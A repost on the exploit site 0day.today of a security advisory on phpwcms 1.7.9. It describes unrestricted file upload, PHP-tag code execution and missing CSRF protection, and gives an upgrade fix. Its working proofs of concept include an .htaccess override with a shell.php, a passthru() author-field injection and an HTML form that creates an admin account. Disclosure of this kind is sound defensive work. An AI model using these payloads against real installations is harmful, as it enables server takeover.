0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
phpwcms 1.7.9 - Multiple Vulnerabilities
[phpwcms 1.7.9 Code Execution and Cross Site Request Forgery Vulnerabilities
Overview
phpwcms allows the upload of files with dangerous type, which leads to code
execution. Additionally, it allows registered users who are not admins to use
PHP tags, which also leads to code execution.
Please note that a user account is needed to upload files. The user does not
need administration rights, but there is no open registration by default (the
form to add users is however open to CSRF).
Unrestricted Upload of File with Dangerous Type
CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C
Description
When uploading files, there are no checks as to the type or extension of the
file.
When uploading single files, these are stored inside the "filearchive"
directory. The original file name is changed to the hash of the file name. The
directory is protected with a .htaccess file from accessing or executing files
directly. Because of this, uploading single files can not easily be exploited;
it may however be possible to execute them via include_int_php (see below).
However, when uploading multiple files, these are stored temporarily inside the
"upload" directory, and these files are not renamed. The "upload" directory is
also protected by an .htaccess file, but as .htaccess files can be uploaded, it
can be overwritten, thus leading to code execution.
Please note that a user account is needed to upload files. The user does not
need administration rights, but there is no open registration by default.
Proof of Concept
Upload a .htaccess file and a PHP file here:
http://localhost/phpwcms-phpwcms-1.7.9/phpwcms.php?do=files&p=8
The .htaccess file should contain:
allow from all
Now the uploaded PHP file can be accessed and executed:
http://localhost/phpwcms-phpwcms-1.7.9/upload/shell.php?x=id
Code Execution
CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C
Description
The functions include_int_php, include_int_phpcode, and include_ext_php can all
be used to gain code execution. These functions can be used by any logged in
user, admin rights are not required.
Proof of Concept
Create a new article. As author, use
[PHP] passthru("touch mynewtest.php") [/PHP]
Visiting
http://localhost/phpwcms-phpwcms-1.7.9/feeds.php
is one of the ways to trigger the code execution.
Please note that the feed is by default cached for one hour, during which the
code would not be executed as the cache is loaded instead.
The vulnerable functions are used in other places as well, which means an
attacker may not have to wait an hour for the cache to clear by triggering the
code elsewhere.
----------------------------------------------
phpwcms 1.7.9 Cross Site Request Forgery
Description
There is no CSRF protection for any forms, which means that an attacker can
perform any action a victim can perform, if the victim visits an attacker
controlled website while logged in. In the case of phpwcms, an attacker can add
an admin user and thus gain code execution.
Proof of Concept
Add Admin User:
<html>
<body>
<form action="http://localhost/phpwcms-phpwcms-1.7.9/phpwcms.php?do=admin&s=1" method="POST">
<input type="hidden" name="form_newloginname" value="Jane" />
<input type="hidden" name="form_newpassword" value="Smith" />
<input type="hidden" name="form_newemail" value="jane.smith@example.com" />
<input type="hidden" name="form_newrealname" value="Jane Smith" />
<input type="hidden" name="form_feuser" value="2" />
<input type="hidden" name="form_active" value="1" />
<input type="hidden" name="form_admin" value="1" />
<input type="hidden" name="verification_email" value="0" />
<input type="hidden" name="form_aktion" value="create_account" />
<input type="hidden" name="Submit" value="send user data" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Solution
To mitigate this issue please upgrade at least to version 1.8.0 RC1:
https://github.com/slackero/phpwcms/archive/phpwcms-1.8.0-RC1.zip
Please note that a newer version might already be available.
# 0day.today [2024-09-28] #